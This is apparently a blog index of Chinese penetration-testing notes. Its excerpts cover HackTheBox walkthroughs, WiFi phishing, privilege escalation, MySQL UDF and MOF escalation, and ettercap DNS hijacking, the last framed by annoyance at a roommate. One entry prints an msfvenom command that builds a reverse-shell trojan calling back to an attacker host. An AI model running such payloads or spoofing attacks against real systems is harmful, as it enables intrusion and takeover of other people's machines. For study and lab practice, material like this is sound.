HackTheBox--BountyHunter
前言这是本人Hack The Box学习笔记的第二篇,由于官方没有提供writeup,所以本人花了较长时间才通关。虽然官方表示难度为“简单”,但无奈本人实在是菜,python代码读不太懂,所以提权时折腾了好半天,才拿到root权限的flag。 正文信息收集老规矩,nmap先扫一波: 1nmap -Pn -A -T4 10.10.11.100 发现开放了ssh和web服务。先用浏览器访问web服务
HackTheBox--Popcorn
前言这是hack the box退休机器里面的一个中级难度的靶场,需要充VIP才能打。对于我这个菜鸡而言,还是很有些难度的,所以特此写个wp记录一下。 正文信息收集nmap先扫一波: 1nmap -Pn -A 10.10.10.6 发现开了web服务和ftp服务,ftp服务没什么用,于是从web服务入手。访问ip地址以后发现只有默认页面,于是dirbuster爆破一下(这里直接选最小的字典就行,
Kali渗透(三)--WiFi钓鱼和断网攻击
前言最近翻看去年买的近源渗透有关的书籍,看到书中有关于WiFi钓鱼的部分,于是突然来了兴趣,在某淘宝店铺购买了两块无线网卡(一块只支持2.4G频段,另一块同时支持2.4G和5G频段),进行WiFi钓鱼。 不得非法入侵他人设备,遵纪守法,天网恢恢疏而不漏。 正文由于我购买的网卡会附赠配好环境的kali虚拟机,所以这里不作讲解。 这里我会列出几种钓鱼的方法,分为钓鱼获取WiFi密码和获取个人信息两种情
Windows和Linux系统提权
Windows提权内核补丁提权在目标机执行systeminfo命令,再把得到的信息复制粘贴到以下网站。 提权辅助网站:http://bugs.hacking8.com/tiquan/ 数据库提权由于篇幅太长,所以单独写了一篇文章。具体方法,可参考本人的另一篇文章。 计划任务提权Windows自带的计划任务分为at和schtasks两种。 AT提权:适用于win7以下的逻辑性利用,创造新的指定文件时
Kali渗透(二)--Linux主机上线和U盘马制作
Linux主机上线msf生成Linux木马和监听 1234567msfconsolemsfvenom -p linux/x64/meterpreter/reverse_tcp lhost=域名或ip lport=端口 sessioncommunicationtimeout=0 sessionexpirationtimeout=0 -f elf>文件名.elfuse exploit/multi
数据库提权
MySQL数据库提权提权方式 udf提权 mof提权 启动项提权 反弹shell提权 udf提权User Defined Functions,简称UDF,通俗来讲就是用户可自定义函数。udf提权就是利用到创建自定义函数(sys_eval),在mysql中调用这个自定义的函数(sys_eval)来实现获取对方主机的system的shell权限,从而达到提权的目的。 简单来说便是利用提权脚本放到对方
Web漏洞综合
前段时间学业繁忙,没有时间整理笔记。正好中秋放假,我就在这里把上周所学的知识归纳总结一下。由于笔记中提到的几种攻击方法如今在红队实战中很少用到,所以对于以下方法只需了解即可,但是安服岗的面试中时常会问到这些。 XSSXSS,即“跨站脚本攻击”(Cross Site Scripting),为了不和“层叠样式表”(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写
Kali渗透(一)--DNS域名劫持与钓鱼
前言最近被室友熬夜打游戏搞得有些破防,正好最近在学习Kali Linux的使用,于是便想到了这一招。 下面我将演示如何借助 Kali Linux 系统内置的一款基于ARP地址欺骗的网络嗅探工具ettercap,对局域网内的 Win7 主机进行 DNS 域名劫持,从而使得受害主机访问任意网站的域名时跳转到 Kali 攻击机指定的恶意网页,实现网络钓鱼攻击。本实验为内网渗透,非公网IP上线。 不得非法